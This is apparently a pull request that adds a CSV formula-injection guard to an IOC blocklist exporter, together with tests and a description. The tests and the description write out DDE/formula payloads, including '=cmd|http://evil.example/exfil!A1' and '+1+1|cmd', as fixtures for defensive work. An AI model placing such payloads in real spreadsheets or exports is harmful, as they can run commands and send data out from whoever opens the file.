### PR TITLE
fix(reports): guard CSV injection in IOC blocklist export

### DIFF
--- a/companion/src/reports/iocBlocklist.ts
+++ b/companion/src/reports/iocBlocklist.ts
@@ -155,8 +155,14 @@ export function buildIocBlocklistTxt(state: InvestigationState, opts: IocBlockli
 // ── CSV format ────────────────────────────────────────────────────────────────
 
 function csvCell(s: string): string {
-  if (/[",\r\n]/.test(s)) return `"${s.replace(/"/g, '""')}"`;
-  return s;
+  // CSV injection guard: a cell starting with = + - @ (or a tab/CR) is interpreted as a formula by
+  // Excel/LibreOffice. Prefix a single quote so spreadsheet apps treat it as text. Mirrors the
+  // guard in csv.ts:cell — the two exporters were written independently and iocBlocklist missed it.
+  // IOC ingest does not reject formula-prefixed values (a token starting with = can be real
+  // evidence), so they reach the export and would execute as formulas on the analyst's machine.
+  const guarded = /^[=+\-@\t\r]/.test(s) ? `'${s}` : s;
+  if (/[",\r\n]/.test(guarded)) return `"${guarded.replace(/"/g, '""')}"`;
+  return guarded;
 }
 
 /**

--- a/companion/tests/reports/iocBlocklist.test.ts
+++ b/companion/tests/reports/iocBlocklist.test.ts
@@ -211,6 +211,30 @@ describe("buildIocBlocklistCsv", () => {
     const csv = buildIocBlocklistCsv(state);
     expect(csv.trim()).toBe("type,value,severity,verdict,description");
   });
+
+  it("guards CSV injection: a value starting with = is prefixed with a single quote", () => {
+    const state = emptyState("c1");
+    state.iocs = [
+      ioc({ id: "i1", type: "url", value: "=cmd|http://evil.example/exfil!A1", enrichments: [enrich("malicious")] }),
+    ];
+    const csv = buildIocBlocklistCsv(state, { minSeverity: "Low" });
+    // The leading = must be neutralized so Excel/LibreOffice don't run it as a formula.
+    expect(csv).toContain("'=cmd|http://evil.example/exfil!A1");
+    expect(csv).not.toMatch(/,=cmd\|/); // never a bare = after a comma
+  });
+
+  it("guards CSV injection: values starting with + - @ are also neutralized", () => {
+    const state = emptyState("c1");
+    state.iocs = [
+      ioc({ id: "i1", type: "domain", value: "+1+1|cmd", enrichments: [enrich("suspicious")] }),
+      ioc({ id: "i2", type: "domain", value: "@SUM(A1)", enrichments: [enrich("suspicious")] }),
+      ioc({ id: "i3", type: "domain", value: "-2+3|calc", enrichments: [enrich("suspicious")] }),
+    ];
+    const csv = buildIocBlocklistCsv(state, { minSeverity: "Low" });
+    expect(csv).toContain("'+1+1|cmd");
+    expect(csv).toContain("'@SUM(A1)");
+    expect(csv).toContain("'-2+3|calc");
+  });
 });
 
 // ── buildIocBlocklistStix ────────────────────────────────────────────────────


### PR DESCRIPTION
## Bug (HIGH — formula execution on analyst's machine)
The IOC blocklist CSV exporter emitted cells starting with `= + - @` unguarded. Excel/LibreOffice interpret them as formulas. A malicious IOC value like `=cmd|http://evil.example/exfil!A1` (DDE payload) would execute on the analyst's machine when the blocklist is opened. The sibling `csv.ts:cell` already had the guard; `iocBlocklist.csvCell` was written independently and missed it.

## Fix
Apply the same `/^[=+\-@\t\r]/ → prefix-`'` guard in `iocBlocklist.csvCell`.

## Verification
- `tsc --noEmit` clean.
- 27 tests pass (+2 new injection-guard tests covering `=` and `+/-/@`).

Found by end-to-end QA reports subagent.